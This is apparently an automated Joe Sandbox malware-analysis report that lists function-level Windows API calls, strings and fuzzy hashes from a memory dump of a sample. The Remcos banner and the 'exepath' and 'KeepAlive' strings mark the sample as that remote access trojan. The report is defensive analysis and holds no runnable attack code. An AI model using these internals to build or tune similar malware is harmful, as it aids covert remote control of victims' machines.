                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                          • String ID: KeepAlive | Disabled
                                          • API String ID: 2993684571-305739064
                                          • Opcode ID: a1239bbaa258f2a34943f968a1ba77755cc365037cc61d007e051ef3d6ef4e82
                                          • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                          • Opcode Fuzzy Hash: a1239bbaa258f2a34943f968a1ba77755cc365037cc61d007e051ef3d6ef4e82
                                          • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                          APIs
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                          • Sleep.KERNEL32(00002710), ref: 0041AE98
                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                          • String ID: Alarm triggered
                                          • API String ID: 614609389-2816303416
                                          • Opcode ID: 3a0a6838436f72e464f3f9b922c545e7727b8fea0b38228e9900d288e1fe9cfd
                                          • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                          • Opcode Fuzzy Hash: 3a0a6838436f72e464f3f9b922c545e7727b8fea0b38228e9900d288e1fe9cfd
                                          • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                          Strings
                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                          • API String ID: 3024135584-2418719853
                                          • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                          • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                          • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction ID: 15e211ccade7fc2a5debfa8ad78d9bfa955d5b29a73147504924d067d3782226
                                          • Opcode Fuzzy Hash: 52d86c3ce57e0cfe0599c5a04198a87027602046587802b200418d3fba34e127
                                          • Instruction Fuzzy Hash: 2771D4319012569BEB21CF55C884AFFBB75EF55310F19412BE815672A0DB78CCC1CBA8
                                          APIs
                                          • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                          • _free.LIBCMT ref: 0044943D
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00449609
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                          • String ID:
                                          • API String ID: 1286116820-0
                                          • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                          • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                          • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                          APIs
                                            • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                            • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                          • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                            • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475348), ref: 0041C08B
                                            • Part of subcall function 0041C076: IsWow64Process.KERNEL32(00000000,?,?,?,00475348), ref: 0041C096
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 2180151492-0
                                          • Opcode ID: bfc89bdae2d650767b4ed35271776d2baa802c3b02b644790fe930e075800330
                                          • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                          • Opcode Fuzzy Hash: bfc89bdae2d650767b4ed35271776d2baa802c3b02b644790fe930e075800330
                                          • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                          • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                          • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                          • __alloca_probe_16.LIBCMT ref: 00451231
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                          • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                          • __freea.LIBCMT ref: 0045129D
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                          • String ID:
                                          • API String ID: 313313983-0
                                          • Opcode ID: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                          • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                          • Opcode Fuzzy Hash: 695a5f3fdf384fa9d4863fe56c7c43b71593cfbe7e8d533d6dff3d4dffab5c55
                                          • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                          APIs
                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,00475300), ref: 0041374F
                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                          • Sleep.KERNEL32(00000BB8), ref: 004127B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenQuerySleepValue
                                          • String ID: HSG$exepath$xdF$RG
                                          • API String ID: 4119054056-3038920021
                                          • Opcode ID: c4910f7145f7cabad12a11c825a9982b7c40ce0abb7968876c3fce6d3367946f
                                          • Instruction ID: 7f535f989f64e3217726da85717e45219a172cbdcd35e6ae3f2d68e0f7be43ad
                                          • Opcode Fuzzy Hash: c4910f7145f7cabad12a11c825a9982b7c40ce0abb7968876c3fce6d3367946f
                                          • Instruction Fuzzy Hash: 1F21D8A1B043042BD604B7365D4AAAF724D8B80358F40897FBA56E73D3EEBD9C45826D
                                          APIs
                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                          • _free.LIBCMT ref: 0044F43F
                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                          • String ID:
                                          • API String ID: 336800556-0
                                          • Opcode ID: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                          • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                          • Opcode Fuzzy Hash: 5a321bf6ad982bb41f22afd847bffa7b7f2aa598f804dd442cdb837d811de21f
                                          • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                          APIs
                                          • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                          • _free.LIBCMT ref: 00448353
                                          • _free.LIBCMT ref: 0044837A
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                          • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free
                                          • String ID:
                                          • API String ID: 3170660625-0
                                          • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                          • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                          • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                          APIs
                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C2B9
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2C4
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C2CC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpen$FileImageName
                                          • String ID:
                                          • API String ID: 2951400881-0
                                          • Opcode ID: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                          • Instruction ID: eb9e11a2b0883253d54455b1eb0df9c10e535dd1e95c930e162dea6fb874dde8
                                          • Opcode Fuzzy Hash: ba3ea50cb646477030606071dcac17ec13321efbd804a8471714c0f1fa06d59f
                                          • Instruction Fuzzy Hash: 2F01F231680215ABD71066949C8AFA7B66C8B84756F0001ABFA08D2292EE74CD81466A
                                          APIs
                                          • _free.LIBCMT ref: 00450A54
                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                          • _free.LIBCMT ref: 00450A66
                                          • _free.LIBCMT ref: 00450A78
                                          • _free.LIBCMT ref: 00450A8A
                                          • _free.LIBCMT ref: 00450A9C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                          • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                          APIs
                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                          • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                          • IsWindowVisible.USER32(?), ref: 00417677
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ProcessWindow$Open$TextThreadVisible
                                          • String ID: (VG
                                          • API String ID: 3142014140-3443974315
                                          • Opcode ID: 24a09c8c4158ed3c0f2a795a4f0c90660d34be4f6c7f404af54177f4e0279c8e
                                          • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                          • Opcode Fuzzy Hash: 24a09c8c4158ed3c0f2a795a4f0c90660d34be4f6c7f404af54177f4e0279c8e
                                          • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                          APIs
                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Enum$InfoQueryValue
                                          • String ID: [regsplt]
                                          • API String ID: 3554306468-4262303796
                                          • Opcode ID: 1912cc85047d6fe9aebfeeb23cc0088c2f2b9ee1c1f314ee2953c53dd398c46e
                                          • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                          • Opcode Fuzzy Hash: 1912cc85047d6fe9aebfeeb23cc0088c2f2b9ee1c1f314ee2953c53dd398c46e
